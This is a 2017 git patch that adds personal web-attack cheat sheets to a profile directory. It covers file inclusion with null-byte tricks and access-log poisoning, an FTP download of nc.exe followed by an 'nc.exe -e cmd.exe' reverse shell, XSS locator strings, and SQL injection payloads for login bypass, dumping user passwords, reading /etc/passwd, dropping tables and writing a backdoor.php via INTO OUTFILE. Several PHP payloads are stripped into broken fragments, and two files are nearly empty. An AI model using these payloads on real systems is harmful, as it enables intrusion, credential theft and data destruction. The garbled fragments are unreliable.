From 1ec27c494cca48578cf1d9ef3fa0dd385503c9e3 Mon Sep 17 00:00:00 2001
From: 51x
Date: Mon, 16 Jan 2017 21:52:08 +0100
Subject: [PATCH] note updates

---
 .../.ptz/v3das/web_file_inclusion.txt | 41 ++++++++++++++++++
 profile_files/.ptz/v3das/web_fuzz_strings.txt | 14 ++++++
 .../.ptz/v3das/web_injection_php.txt | 11 +++++
 .../.ptz/v3das/web_injection_sqli.txt | 43 +++++++++++++++++++
 .../.ptz/v3das/web_xss_cookie_stealing.txt | 3 ++
 5 files changed, 112 insertions(+)
 create mode 100644 profile_files/.ptz/v3das/web_file_inclusion.txt
 create mode 100644 profile_files/.ptz/v3das/web_fuzz_strings.txt
 create mode 100644 profile_files/.ptz/v3das/web_injection_php.txt
 create mode 100644 profile_files/.ptz/v3das/web_injection_sqli.txt
 create mode 100644 profile_files/.ptz/v3das/web_xss_cookie_stealing.txt

diff --git a/profile_files/.ptz/v3das/web_file_inclusion.txt b/profile_files/.ptz/v3das/web_file_inclusion.txt
new file mode 100644
index 0000000..c4e4c7e
--- /dev/null
+++ b/profile_files/.ptz/v3das/web_file_inclusion.txt
@@ -0,0 +1,41 @@
+
+Local File Inclusion
+====================
+
+The %00 make php 5.3 and below ignore everything after that.
+
+Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00
+...then let's add code to the access log :)
+~# nc 192.168.1.1 80
+
+...and use it
+http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00
+...or php shell on linux:)
+&3 2>&3");?>
+...finally send the requests to nc and exploit:
+
+# Windows FTP upload
+echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt
+nc.exe -e cmd.exe 192.168.1.1  31337
+
+- - - - - - - -
+ ftp.txt'); ?>
+> ftp.txt'); ?>
+> ftp.txt'); ?>
+> ftp.txt'); ?>
+> ftp.txt'); ?>
+> ftp.txt'); ?>
+
+
+
+
+
+
+
+
+
+Remote file Inclusion
+=====================
+Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00
+Note: the login.txt contains
+
diff --git a/profile_files/.ptz/v3das/web_fuzz_strings.txt b/profile_files/.ptz/v3das/web_fuzz_strings.txt
new file mode 100644
index 0000000..72bb7c3
--- /dev/null
+++ b/profile_files/.ptz/v3das/web_fuzz_strings.txt
@@ -0,0 +1,14 @@
+
+XSS locator
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>
+
+
+XSS locator 2
+'';!--"=&{()}
+
+
+
+
+Other fuzzing char list
+><>)()}{}][]'"`;--..\/\\//../~=-1!--?||*&&%00%0a%0d\r\n#><>}{}
+
diff --git a/profile_files/.ptz/v3das/web_injection_php.txt b/profile_files/.ptz/v3das/web_injection_php.txt
new file mode 100644
index 0000000..72dd935
--- /dev/null
+++ b/profile_files/.ptz/v3das/web_injection_php.txt
@@ -0,0 +1,11 @@
+
+PHP command injection
+=====================
+
+There are just some ideas.
+
+
+
+
+
+
diff --git a/profile_files/.ptz/v3das/web_injection_sqli.txt b/profile_files/.ptz/v3das/web_injection_sqli.txt
new file mode 100644
index 0000000..d459f64
--- /dev/null
+++ b/profile_files/.ptz/v3das/web_injection_sqli.txt
@@ -0,0 +1,43 @@
+
+SQLi notes
+==========
+
+Login bypass
+any' or 1=1 limit 1 ;#
+' OR '1' = '1 / ' OR '1' = '1
+;# ;-- #
+
+
+?id=737 order by 6 --> Testing max columns
+?id=737 union select all 1,2,3,4,5,6 --> Testing max columns in database
+?id=737 union select all 1,2,3,4,@@version,6 --> Version enumeration, commands to run or exploits?
+?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables --> Table enumeration
+?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user' --> Column enumeration
+?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users --> After knowing about "users" pull out the info
+
+
+More examples
+
+x%') #
+x%') or 1=1 #
+x%') order by 4 #
+x%') union select all 4 #
+x%') union select all 1,2,3@@version #
+x%') and 1=1 #
+
+x%') and UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) #
+x%') and drop table if exists customers #
+x%') and create database test #
+x%') ; DROP ALL TABLES; #
+
+@@hostname
+
+wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value"
+
+
+Adding backdor.php
+?id=737 union select all 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
+
+Getting a shell with php execute
+192.168.3.1/comment.php?id=737 union select all 1,2,3,4," ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php'
+
diff --git a/profile_files/.ptz/v3das/web_xss_cookie_stealing.txt b/profile_files/.ptz/v3das/web_xss_cookie_stealing.txt
new file mode 100644
index 0000000..e494f29
--- /dev/null
+++ b/profile_files/.ptz/v3das/web_xss_cookie_stealing.txt
@@ -0,0 +1,3 @@
+
+
+